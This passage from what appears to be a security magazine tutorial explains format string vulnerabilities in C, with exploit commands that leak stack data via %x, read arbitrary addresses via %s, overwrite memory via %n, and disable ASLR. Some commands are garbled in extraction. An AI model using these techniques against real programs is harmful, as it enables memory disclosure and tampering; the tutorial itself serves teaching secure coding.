of a process through the Linux kernel. In this event, where the executable attempts to fork and a greater
number of forks would come into existent than are defined by RLIMIT_NPROC processes, the fork fails. The
Linux kernel module, rexFBD when installed, detects excessive forking and stops these.
The end result is that memory leaks including format string vulnerabilities can act as a means of locating
particular libraries and variables within a running process. The location of both stack and heap variables may
be determined. From this, the attacker can discover the structures contained within a program.
4: printf(buff);
printf(%s, buff);
228
This is the same code we looked at above in our small program snippet. All that is missing is the %s in the
printf() function and we have left our program vulnerable to exploits from attackers.
The issue with functions such as printf() is that they pass all of the format strings variable arguments onto
the stack in reverse order. The printf() function will parse any input it has received to the point where a
format character has been received. The function then positions the presented argument on the stack based
on the index of the format character it has received.
A malicious user can specifically formulate an input value that includes format characters. The printf()
function will look up and return former data that exists on the stack. In this way, a malicious user can
successfully retrieve data that is held within the stack. If we compile and run our code segment, we can see
this in action.
When run by a normal user not attempting to exploit our code, the program run as follows: see Figure 3.
229
As we stated, it runs OK when a normal non-malicious user enters the form of data that the developers
expected to receive. Even with the warning, many developers fail to act and leave the code vulnerable to an
attack. The compiler will warn you of the error, but it will not stop you from creating vulnerable code.
The problem is not Use-case testing, it is Abuse-case data. If for instance, we send a string of format
characters as input to our program, we see something wrong has occurred. An attacker can use this
vulnerability to effectively read the stack (this example we have turned off ASLR by echoing 0 to /proc/sys/
kernel/randomize_va_space).
localhost:~$ ./Format_Exploit AAAA %x %x %x %x
AAAA bfb54630 0 b7781b40 1
localhost:~$./Format_Exploit
AAAA%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x
AAAAbffff973.bffff7a4.bffff7e0.bffff834. 804825d.f63d4e2e.
0.41414141.2e783825
The string argument that is passed to the printf() function is held in the stack frame just preceding the
printf() functions call. The stack is a last in, first out (LIFO) abstract data structure. We can think of it as a
pile of plates in a restaurant. The last plate on the stack of plates is taken off first for re-use. So it is with the
memory stack as well. The last entry pushed to the stack is the first one popped off of it.
When we sent the format characters as input, AAAA %x %x %x %x, we had a small section of the stack returned
to us. Next, we entered AAAA%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x and as can be seen in Figure 4, we have even
more of the stack returned. What we see is the second to final %x has output the first AAAA (displayed in hex as
41414141).
An attacker can actually print off as little or as much information from the stack as they desire simply by
repeating the format string arguments. A simple little programming error where the programmer forgot
to include the correct specifiers allows an attacker to create and inject their own. If you notice the value
41414141, this references the string AAAA we entered and indicates the eighth argument is reading from the start
of our format string. The value 8 we entered as a format string sets the width as a minimum length of the
argument (although this could be larger).
Say we wish to read the memory address at an arbitrary location in memory 0x0000DEAD, using this
vulnerability we can. Add the address we want to read from memory (in this case 0x0000DEAD) in reverse order
(for a little endian system) to begin a string. Follow this with the eight 8-bytes stack locations (%8x) and
finish the string using a %s format character at the 9th position to read our address (and opps... A core dump).
./Format_Exploit $(printf xefxbexadxde)%8x%8x%8x%8x%8x%8x%8x%8x%s
Segmentation fault (core dumped)
Lets start by looking for a location. Start GBD with the command gdb ./Format_Exploit. Using the %s format
specifier, we will be able to display some data from the stack at a memory location of our choice. The value
230
0x8048220
You should notice libc.so.6 at location 0x804822c and __libc_start_main at 0x804822c. We will now use this
address in our format string to display it from our buggy program.
./Format_Exploit $(printf x5dx82x48x80)$(python -c print %08x+*4)%s
x5dx82x48x80bffff978+bffff7a4+bffff7e0+bffff834+__libc_start_main
Here we have typed our format identifier: x5dx82x48x80%08x+%08x+%08x+%08x+%s
Opps, we forgot to add a format identifier here
Writing to Memory %n
To really exploit format string vulnerabilities, we do not simply wish to read a value from memory (although
this is important when seeking passwords and other data). In place of $s as noted in the previous section,
using %n will overwrite memory locations. An attacker can use this to modify values stored by the program
(for instance changing the value of a financial transaction).
There are a number of controls that have been developed in order to minimise the effects of vulnerabilities
that can write to memory such as buffer overflow and format string attacks. These include address
obfuscation through randomizing the absolute locations of all code and data, Data Execution Prevention and
even Stack Canaries but we are not looking into these in this article.
In order to do this, we will use the following format specifiers:
%n
%#x
The %x specifier is very important as it allows us to regulate how many characters are written by the
printf() function we are exploiting. When you specify a format character, you can provide an integer for the
size of the format character (e.g. $3x would be width 3). We use the %n specifier to overwrite the integer value
of the target address a single byte at a time.
In Figure 6, we have updated our code printing the value of the memory variable for an integer value held in
the program.
231
Figure 6. An Update
The code now also returns an integer and prints its location (saving us looking for it).
Alternatively, we could simply run objdump (Figure 8) and have the location returned to us that way. Notice
that the two values in Figures 7 and 8 do not match. We have run this on a couple systems and memory of
course will vary from system to system, hence why we need to locate the variables we wish to overwrite.
We will go into detail about this method of overwriting data in a follow-up article.
What we have done is to seek to overwrite a memory location.
./Format_Exploit `python -c print x60x96x04x08`%x%x%x%x%x%x%x%x%n
This is a time consuming and messy way of seeking the location we wish to overwrite and to obtain the
value we want. As we can see from Figure 9, it is also a method that can result in the crashing of the
application. This can lead to a self imposed DoS by the attacker against themself (through locking themself
out of the application they are attempting to exploit).
232
Figure 9. Crash
More importantly, this is a noisy means of creating an exploit and if the attacker does not have complete
control of the system the application is running on, they may find that they have alerted the system
administrator to their presence.
Why Python?
Python is particularly valuable to the exploit writer for many reasons. Here we will list just a few of the built-in
functions that are frequently deployed in Python scripts.
print
The print function returns output or the contents of variables. Format string modifiers can modify the output
of print. Just like in C code Python has format conversion specifiers including arguments such as those
below. The format string modifiers are placed after a trailing % in a comma-separated list within parenthesis:
%d
%s
for a string; or
%x for
a hexadecimal value);
len
Returns the length of any object. The len function is a convenient means to determine the length of a string. It can
also be used to return the number of elements in a list.
int
Converts a string to an integer. This function is frequently needed where input has been received as a string,
but which needs to be changed into some numerical value in order to have mathematical operators (+,-,*,/
etc.) used without error.
ord
Converts string data to an ordinal value. Similar to int, this function allows strings of binary data to be
converted into numerical form where these values are beyond the standard numeric ranges of an integer value.
When we are seeking to exploit a location in memory, python allows us to control the input with far more
finesse and fewer errors than if we had started trying to count how many format specifiers to type for instance.
233
We see in Figure 10 that we have changed the answer stored in the application from 100 to 23. In a subsequent
article, we will follow up on this process by setting the width parameter and the requirements for padding. This
will allow us to select just what we write and the value we inject into our format string vulnerability.
Conclusion
We can see from this that simple common programming errors that come from the failure to include a
simple format identifier can lead to devastating results. Unfortunately, many current textbooks and C/C++
programming classes still teach these poor programming practices and lead to developers who do not even
realise (see for example, http://stackoverflow.com/questions/1677824/snowleopard-xcode-warning-formatnot-a-string-literal-and-no-format-arguments) they are leaving gaping security holes in their code. Many
developers who realise that the warning issued from current versions of gcc when they forget to correctly
include the correct number of format identifiers can be ignored simply do just that. They ignore the error and
compile their code, bugs and all.
Format sting vulnerabilities are not new. It is a worry that a decade later we still suffer these same issues,
but then, as always, how we teach new developers matters. Until we start to make compiler warnings into
hard errors that stop the compilation of code and start to really teach the need to ensure format strings are
managed, the problems will persist. This process can be continued further through the exploitation of Direct
Parameter Access (DPA) as it will allow us to write into the address of our choosing. In the next article,
we will extend the overwriting of memory looking more at using %n to overwrite specific memory locations
and some techniques to ensure success without so many segmentation faults and errors and then move on to
covering overwriting the Global Offset Table (GOT; Global Offset Tables: http://bottomupcs.sourceforge.net/
csbu/x3824.htm). We will demonstrate how this can be used to inject shell code.
234
80+ Classes
40+ Microsoft Expert
Speakers
Get Your Texas-Sized
Registration Discount
Register NOW!
www.sptechcon.com